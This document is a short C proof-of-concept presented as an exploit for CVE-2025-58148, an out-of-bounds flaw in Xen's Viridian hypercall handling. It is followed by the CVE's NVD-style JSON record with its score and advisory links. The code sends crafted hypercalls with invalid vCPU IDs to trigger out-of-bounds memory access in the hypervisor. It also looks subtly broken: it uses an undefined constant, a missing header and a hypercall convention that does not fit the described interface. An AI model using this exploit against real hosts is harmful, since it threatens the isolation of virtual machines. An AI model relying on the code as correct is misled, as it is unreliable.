CVE-2025-58148

// CVE-2025-58148 PoC - Xen Viridian hypercall out-of-bounds access // This PoC demonstrates sending a malicious hypercall with invalid vCPU IDs #include <stdint.h> #include <xen/xen.h> // Viridian hypercall codes #define __HYPERVISOR_viridian_call 43 // Viridian call numbers #define HV_VP_SET 0x81 // Malicious VP_SET input structure struct vp_set_input { uint32_t format; // Sparse format = 2 uint32_t vcpu_count; uint64_t vcpu_mask; // Contains invalid vCPU IDs beyond d->vcpu[] bounds }; int trigger_viridian_out_of_bounds(void) { struct vp_set_input input; // Set format to Sparse (2) - triggers vpmask_set() path input.format = 2; input.vcpu_count = 0xFFFFFFFF; // Large count value input.vcpu_mask = 0xFFFFFFFFFFFFFFFFULL; // All bits set - many invalid IDs // Issue the malicious hypercall register uint64_t r0 __asm__("rax") = HV_VP_SET; register uint64_t r1 __asm__("rdx") = (uint64_t)&input; __asm__ volatile ( "mov %0, %%rax\n" "mov %1, %%rdx\n" "vmcall\n" : : "r"(r0), "r"(r1) : "rax", "rdx", "memory" ); return 0; } // Alternative: send_ipi() out-of-bounds trigger int trigger_send_ipi_oob(void) { // Trigger send_ipi() with vCPU ID >= max_vcpus register uint64_t r0 __asm__("rax") = HV_SEND_IPI; // Specific call number register uint64_t r1 __asm__("rdx") = 0xFFFFFFFF; // Invalid vCPU ID __asm__ volatile ( "mov %0, %%rax\n" "mov %1, %%rdx\n" "vmcall\n" : : "r"(r0), "r"(r1) : "rax", "rdx", "memory" ); return 0; } int main() { printf("CVE-2025-58148 PoC - Xen Viridian OOB Access\n"); trigger_viridian_out_of_bounds(); trigger_send_ipi_oob(); return 0; }

{"cve": {"id": "CVE-2025-58148", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:35.037", "lastModified": "2026-01-14T22:03:32.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "[This CNA information record relates to multiple CVEs; the\ntext explains which aspects/vulnerabilities correspond to which CVE.]\n\nSome Viridian hypercalls can specify a mask of vCPU IDs as an input, in\none of three formats. Xen has boundary checking bugs with all three\nformats, which can cause out-of-bounds reads and writes while processing\nthe inputs.\n\n * CVE-2025-58147. Hypercalls using the HV_VP_SET Sparse format can\n cause vpmask_set() to write out of bounds when converting the bitmap\n to Xen's format.\n\n * CVE-2025-58148. Hypercalls using any input format can cause\n send_ipi() to read d->vcpu[] out-of-bounds, and operate on a wild\n vCPU pointer."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.0", "matchCriteriaId": "E77C52A9-C85D-4198-B397-2F7BF859CBE7"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-475.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/21/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-475.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}